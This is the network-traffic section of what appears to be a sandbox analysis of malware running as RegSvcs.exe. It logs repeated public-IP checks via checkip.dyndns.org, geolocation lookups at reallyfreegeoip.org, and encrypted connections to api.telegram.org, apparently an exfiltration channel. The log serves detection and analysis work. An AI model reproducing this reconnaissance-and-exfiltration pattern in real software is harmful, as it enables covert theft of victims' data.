                                                                                                                  Jan 10, 2025 20:37:53.915822029 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.917849064 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.917885065 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.059377909 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.059421062 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.060204983 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:54.062469959 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:54.109118938 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:54.114078045 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.114135981 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:54.116293907 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.116317034 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.116360903 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.120287895 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.120300055 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.735423088 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.735567093 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.739479065 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.739490986 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.739873886 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.741916895 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.787331104 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.985490084 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.985565901 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.985690117 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.991056919 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.493238926 CET4971480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:38:00.661494017 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.661526918 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:00.661602020 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.661850929 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.661864042 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.277432919 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.291018009 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:01.291045904 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.291117907 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:01.291129112 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.600116014 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.600195885 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.600238085 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:01.600744963 CET49830443192.168.2.6149.154.167.220

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 20:37:41.962207079 CET6485753192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET53648571.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:42.997613907 CET5332153192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET53533211.1.1.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.108992100 CET5237353192.168.2.61.1.1.1
                                                                                                                  Jan 10, 2025 20:37:54.115575075 CET53523731.1.1.1192.168.2.6

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 20:37:41.962207079 CET192.168.2.61.1.1.10xc452Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:42.997613907 CET192.168.2.61.1.1.10xe68Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:54.108992100 CET192.168.2.61.1.1.10x9fbaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET1.1.1.1192.168.2.60xc452No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET1.1.1.1192.168.2.60xc452No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET1.1.1.1192.168.2.60xc452No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET1.1.1.1192.168.2.60xc452No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET1.1.1.1192.168.2.60xc452No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:41.969078064 CET1.1.1.1192.168.2.60xc452No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:43.005613089 CET1.1.1.1192.168.2.60xe68No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 20:37:54.115575075 CET1.1.1.1192.168.2.60x9fbaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.649710132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:41.980315924 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:42.740592957 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 10, 2025 20:37:42.744561911 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 20:37:42.958389997 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 10, 2025 20:37:43.702404976 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 20:37:43.917732000 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:43 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.649714132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:44.578048944 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 20:37:45.253782988 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:45 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.649721132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:45.934077024 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:46.777050972 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:46 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.649733132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:47.379661083 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:48.083070040 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:47 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.649744132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:48.725141048 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:49.419161081 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:49 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.649752132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:50.061391115 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:50.861355066 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:50 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.649764132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:51.478260040 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:52.150430918 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:52 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.649776132.226.247.73801340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 20:37:52.762599945 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 20:37:53.454581976 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:53 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.649711104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:43 UTC859INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:43 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852652
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4OY0DfEZEW4%2FH4GqQUQZj1amrZWQyiXnKz8ifLqeodQWH8aIpl0uVGjFnRejNcdvDx%2FFSVnaav5xyU8jCYkR%2B934CYnujbYZnFU8Ibv0U%2FZrvCmRM381bZQF4ilSo89SFHJ1Kl%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1f8fae1a424b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1523&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1806930&cwnd=248&unsent_bytes=0&cid=43ce87b78edf7b36&ts=187&x=0"
                                                                                                                  2025-01-10 19:37:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.649712104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:44 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-10 19:37:44 UTC861INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:44 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852653
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4baSytH6hFMszWZracXkeGp8JqTmvnQXecOOrLeOE%2Bpp8Gd%2BUqEjamN3tPW0x%2B31IEb2s3%2FlKcYkGGhfvdcbl2qIaro%2FFlcpby6i2H76wsytuzu%2Bz6ie2jdQm44dsrLH5tG1YNxH"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1f952fe8727b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1915&rtt_var=736&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1468812&cwnd=234&unsent_bytes=0&cid=4910212d9ad0f2f0&ts=176&x=0"
                                                                                                                  2025-01-10 19:37:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.649715104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:45 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-10 19:37:45 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:45 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
